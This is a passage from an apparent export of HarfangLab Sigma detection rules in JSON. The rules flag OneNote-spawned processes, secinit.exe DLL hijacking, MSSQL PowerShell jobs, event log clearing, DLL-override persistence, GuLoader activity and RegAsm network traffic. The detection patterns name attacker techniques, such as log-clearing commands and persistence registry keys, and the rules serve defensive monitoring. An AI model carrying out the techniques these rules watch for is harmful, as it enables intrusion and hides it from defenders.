'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_xpsrchvw:\n ProcessImage:\n - '?:\\Windows\\System32\\xpsrchvw.exe'\n - '?:\\Windows\\SysWOW64\\xpsrchvw.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_mspaint:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\SysWOW64\\mspaint.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_notepad:\n ProcessImage:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_code:\n ProcessOriginalFileName: 'electron.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_pdf:\n Image|endswith: '\\PDF Viewer\\PDFXCview.exe'\n ProcessOriginalFileName: 'PDFXCview.exe'\n\n exclusion_xmind:\n ProcessInternalName: 'Xmind'\n ProcessSigned: 'true'\n ProcessSignature: 'XMind Ltd.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c90af83-d510-4bab-9999-c5318f2ae93e",
"rule_name": "Suspicious Process Spawned by Microsoft OneNote",
"rule_description": "Detects a suspicious child process started from the Microsoft OneNote application.\nOneNote has become, since the beginning of the year 2023, a fixture in malware delivery, generally used by tricking an user to click on embedded malicious files (hta, exe, ppt...).\nOther files such as JavaScript (.js) or VisualBasic (.vbe) can be used as well.\nIt is recommended to investigate the process spawned by OneNote and other potentially malicious activities on the machine.\n",
"rule_creation_date": "2023-02-06",
"rule_modified_date": "2025-04-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1218",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ccea6af-f31b-4f4c-8750-a0295d7ea415",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081792Z",
"creation_date": "2026-03-23T11:45:34.081794Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081798Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_secinit.yml",
"content": "title: DLL Hijacking via secinit.exe\nid: 5ccea6af-f31b-4f4c-8750-a0295d7ea415\ndescription: |\n Detects potential Windows DLL Hijacking via secinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'secinit'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ccea6af-f31b-4f4c-8750-a0295d7ea415",
"rule_name": "DLL Hijacking via secinit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via secinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ced6f26-1cff-41ca-aa7a-fcd4bfb178f7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606772Z",
"creation_date": "2026-03-23T11:45:34.606775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_job_powershell.yml",
"content": "title: Execution of a Suspicious MSSQL PowerShell Job\nid: 5ced6f26-1cff-41ca-aa7a-fcd4bfb178f7\ndescription: |\n Detects the execution of a MSSQL job using the PowerShell subsystem.\n Attackers may execute a PowerShell job in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\sqlps.exe'\n\n filter_mssql:\n Image|endswith:\n - '\\Tools\\Binn\\sqlcmd.exe'\n - '\\Tools\\Binn\\bcp.exe'\n - '\\Tools\\Binn\\SQLPS.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n filter_conhost:\n Image:\n - '?:\\WINDOWS\\system32\\conhost.exe'\n - '?:\\WINDOWS\\syswow64\\conhost.exe'\n CommandLine:\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Syswow64\\WerFault.exe'\n\n exclusion_divalto: # ERP solution\n - Image|endswith: '\\ERP-DIVALTO\\EchangeERP\\DivaComSiplace.exe'\n - Image: '?:\\Windows\\System32\\WScript.exe'\n CommandLine|contains: '\\ERP-DIVALTO\\EchangeERP\\'\n\n exclusion_nsca:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c *\\NSCA\\check_nsca.bat *;check_*'\n\n exclusion_image:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\System32\\fondue.exe'\n - '?:\\ProgramData\\anaconda3\\python.exe'\n - '?:\\Windows\\System32\\pcaui.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\dw20.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\dw20.exe'\n\n exclusion_shimadzu:\n CommandLine: '?:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command New-Item -ItemType Directory -Force -Path ??:\\Program Files\\Shimadzu Corporation\\MALDI Solutions\\Database\\\\\\\\Backups?'\n\n exclusion_forfiles:\n Image: '?:\\Windows\\System32\\forfiles.exe'\n CommandLine|contains: '/C cmd /c del @file'\n\n exclusion_cmd:\n CommandLine|startswith:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\'\n\n exclusion_generic_scripts_folder:\n CommandLine|contains:\n - 'powershell.exe D:*\\Scripts'\n - 'pwsh.exe D:*\\Scripts'\n - 'powershell.exe -file D:*\\Scripts'\n - 'pwsh.exe -file D:*\\Scripts'\n\n exclusion_vsjitdebugger:\n CommandLine|startswith: '?:\\windows\\system32\\vsjitdebugger.exe PID '\n\n exclusion_python:\n CommandLine: '?:\\Tools\\python???\\python.exe ?:*.py'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ced6f26-1cff-41ca-aa7a-fcd4bfb178f7",
"rule_name": "Execution of a Suspicious MSSQL PowerShell Job",
"rule_description": "Detects the execution of a MSSQL job using the PowerShell subsystem.\nAttackers may execute a PowerShell job in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5cf9b4f6-6f3b-4d0b-a178-9570cce9693d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595518Z",
"creation_date": "2026-03-23T11:45:34.595521Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595529Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/",
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_eventlog.yml",
"content": "title: Windows Event Logs Cleared\nid: 5cf9b4f6-6f3b-4d0b-a178-9570cce9693d\ndescription: |\n Detects when one of the Windows event logs is cleared through wevutil or PowerShell.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to analyze the parent process to look for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2021/04/27\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_wevtutil_1:\n - Image|endswith: '\\wevtutil.exe'\n - OriginalFileName: 'wevtutil.exe'\n\n selection_wevtutil_2:\n - CommandLine|contains:\n - ' clear-log '\n - ' cl '\n\n selection_ps_1:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_ps_2:\n - CommandLine|contains:\n - ' Clear-EventLog '\n - ' Remove-EventLog '\n\n selection_wmic_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_wmic_2:\n - CommandLine|contains: ' ClearEventLog'\n\n exclusion_citrix:\n CommandLine|startswith: '?:\\Windows\\system32\\wevtutil.exe cl '\n ParentCommandLine:\n - '*\\CitrixOptimizerTool\\CitrixOptimizerTool.exe'\n - '*\\CitrixOptimizerTool_*\\CitrixOptimizerTool.exe'\n - '?:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe *CtxOptimizerEngine.ps1 -Source *Citrix_Windows_*.xml -Mode Execute*'\n - '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - '*\\citrixoptimizer\\citrixoptimizertool.exe'\n\n exclusion_vda_cloning_orchestrator:\n GrandparentCommandLine: '?:\\Windows\\System32\\cscript.exe ?:\\VDA Cloning Orchestrator\\VDA Cloning Orchestrator.vbs'\n\n exclusion_bisf:\n GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files\\Base Image Script Framework (BIS-F)\\PrepareBaseImage.cmd'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\PrepareBaseImage.cmd'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n\n exclusion_cleanmgr:\n GrandparentCommandLine|endswith:\n - '\\CLEANMGR+\\Cleanmgr+.exe'\n - '\\CLEANMGR+\\cleanmgrplus\\Cleanmgr+.exe'\n - '\\Cleanmgr+ v*\\Cleanmgr+.exe'\n\n exclusion_atera:\n GrandparentImage: '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\AgentPackageSystemTools.exe'\n\n exclusion_fsecure_uninstaller:\n CommandLine: 'wevtutil cl FSecureUltralightSDK'\n ParentImage: '?:\\Windows\\Temp\\FS_UL_?\\fs*.tmp\\uninstall.exe'\n\n exclusion_privazer:\n Ancestors|contains: '\\PrivaZer\\PrivaZer v*.exe|'\n\n condition: ((all of selection_wevtutil_*) or (all of selection_ps_*) or (all of selection_wmic_*)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5cf9b4f6-6f3b-4d0b-a178-9570cce9693d",
"rule_name": "Windows Event Logs Cleared",
"rule_description": "Detects when one of the Windows event logs is cleared through wevutil or PowerShell.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to analyze the parent process to look for malicious content or actions.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2025-10-21",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5d54d0e8-81b2-43b4-bf1e-c57b6384b805",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078618Z",
"creation_date": "2026-03-23T11:45:34.078620Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078625Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/naturallanguage6.html",
"https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_natural_language_dll_override.yml",
"content": "title: Possible Persistence Added via Natural Language 6 DLL Override\nid: 5d54d0e8-81b2-43b4-bf1e-c57b6384b805\ndescription: |\n Detects a modification of the DLL override registry key regarding the natural language 6 configuration in the Windows registry.\n This method is used as a mean to achieve persistence by setting the key to a malicious DLL, allowing execution through SearchIndexer.exe.\n It is recommended to investigate the process that modified the registry and to analyze the DLL pointed to by the registry value to look for suspicious content.\nreferences:\n - https://persistence-info.github.io/Data/naturallanguage6.html\n - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\'\n TargetObject|endswith:\n - '\\StemmerDLLPathOverride'\n - '\\WBDLLPathOverride'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5d54d0e8-81b2-43b4-bf1e-c57b6384b805",
"rule_name": "Possible Persistence Added via Natural Language 6 DLL Override",
"rule_description": "Detects a modification of the DLL override registry key regarding the natural language 6 configuration in the Windows registry.\nThis method is used as a mean to achieve persistence by setting the key to a malicious DLL, allowing execution through SearchIndexer.exe.\nIt is recommended to investigate the process that modified the registry and to analyze the DLL pointed to by the registry value to look for suspicious content.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5d565065-8f0b-4339-9f87-c2c74b742414",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595468Z",
"creation_date": "2026-03-23T11:45:34.595472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595479Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/software/S0561/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_guloader_process_access.yml",
"content": "title: Possible GuLoader Process Access\nid: 5d565065-8f0b-4339-9f87-c2c74b742414\ndescription: |\n Detects suspicious process accesses associated with a GuLoader-specific, NSIS installer-related DLL.\n GuLoader is a small NSIS installer downloader used to download RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\n It is recommended to analyze the binary making the process access to look for malicious contents and determine its legitimacy.\nreferences:\n - https://attack.mitre.org/software/S0561/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/04/18\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1566.002\n - attack.execution\n - attack.t1106\n - attack.t1204.001\n - attack.t1204.002\n - attack.s0561\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Malware.GuLoader\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n GrantedAccess: '0x1FFFFF'\n CallTrace|contains: '|?:\\Users\\\\*\\AppData\\Local\\Temp\\ns?????.tmp\\System.dll+*'\n\n exclusion_firefox:\n TargetProcessImage|endswith: '\\firefox.exe'\n\n exclusion_plex:\n ProcessGrandparentImage: '?:\\Program Files\\Plex\\Plex\\Plex.exe'\n\n exclusion_legitimate_signers:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, LLC'\n - 'Cyberlink Corp.'\n - '3dhistech Kft.'\n - 'Driver Support'\n - 'Open Source Developer, Ryosuke Asano'\n - 'PQ Labs Inc'\n - 'Tim Kosse' # FileZilla\n - 'Plex, Inc.'\n - 'Mozilla Corporation'\n\n exclusion_sogou:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\ns*.tmp\\setup_new.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Beijing Sogou Technology Development Co., Ltd.'\n\n exclusion_zeninstaller:\n - ProcessParentImage|endswith: '\\zen.installer.exe'\n ProcessDescription:\n - 'Zen Installer'\n - 'Zen Browser Installer'\n TargetProcessImage: '?:\\Program Files\\Zen Browser\\zen.exe'\n - ProcessCommandLine: '.\\setup.exe'\n ProcessParentImage|endswith: '\\zen.installer.exe'\n TargetProcessImage|endswith: '\\zen.exe'\n\n exclusion_commandline:\n ProcessCommandLine|contains:\n - '\\Au_.exe _?=?:\\Program Files\\'\n - '\\Au_.exe _?=?:\\Program Files (x86)\\'\n - '\\Un_A.exe _?=?:\\Program Files\\'\n - '\\Un_A.exe _?=?:\\Program Files (x86)\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5d565065-8f0b-4339-9f87-c2c74b742414",
"rule_name": "Possible GuLoader Process Access",
"rule_description": "Detects suspicious process accesses associated with a GuLoader-specific, NSIS installer-related DLL.\nGuLoader is a small NSIS installer downloader used to download RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\nIt is recommended to analyze the binary making the process access to look for malicious contents and determine its legitimacy.\n",
"rule_creation_date": "2024-04-18",
"rule_modified_date": "2025-05-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1071.001",
"attack.t1106",
"attack.t1204.001",
"attack.t1204.002",
"attack.t1566.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5d9c9ce0-2415-4246-acc7-bcf7ab1e7f03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085796Z",
"creation_date": "2026-03-23T11:45:34.085798Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085803Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_012_regasm_suspicious_network_communication.yml",
"content": "title: Suspicious RegAsm.exe Network Communication\nid: 5d9c9ce0-2415-4246-acc7-bcf7ab1e7f03\ndescription: |\n Detects network communications via a non standard port from RegAsm.exe.\n Adversaries can use RegAsm.exe as a hollowed process and inject malicious code into it to evade process-based defenses.\n It is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://www.sentinelone.com/labs/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2023/09/29\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - attack.command_and_control\n - attack.t1571\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\RegAsm.exe'\n - ProcessOriginalFileName: 'RegAsm.exe'\n\n filter_http:\n DestinationPort: '80'\n\n exclusion_programfiles:\n ProcessCommandLine|contains:\n - '\\regasm.exe ?:\\Program Files\\'\n - '\\regasm.exe ?:\\Program Files (x86)\\'\n\n exclusion_schneider:\n ProcessCommandLine|endswith:\n - '\\RegAsm.exe /codebase ?:\\Program Files\\Common Files\\Schneider Electric Shared\\\\*\\\\*\\ZephyrDtm.Kernel.dll'\n - '\\RegAsm.exe /codebase ?:\\Program Files (x86)\\Common Files\\Schneider Electric Shared\\\\*\\\\*\\ZephyrDtm.Kernel.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5d9c9ce0-2415-4246-acc7-bcf7ab1e7f03",
"rule_name": "Suspicious RegAsm.exe Network Communication",
"rule_description": "Detects network communications via a non standard port from RegAsm.exe.\nAdversaries can use RegAsm.exe as a hollowed process and inject malicious code into it to evade process-based defenses.\nIt is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2023-09-29",
"rule_modified_date": "2025-05-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5db05080-c59d-44b1-8530-0b311ce322d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
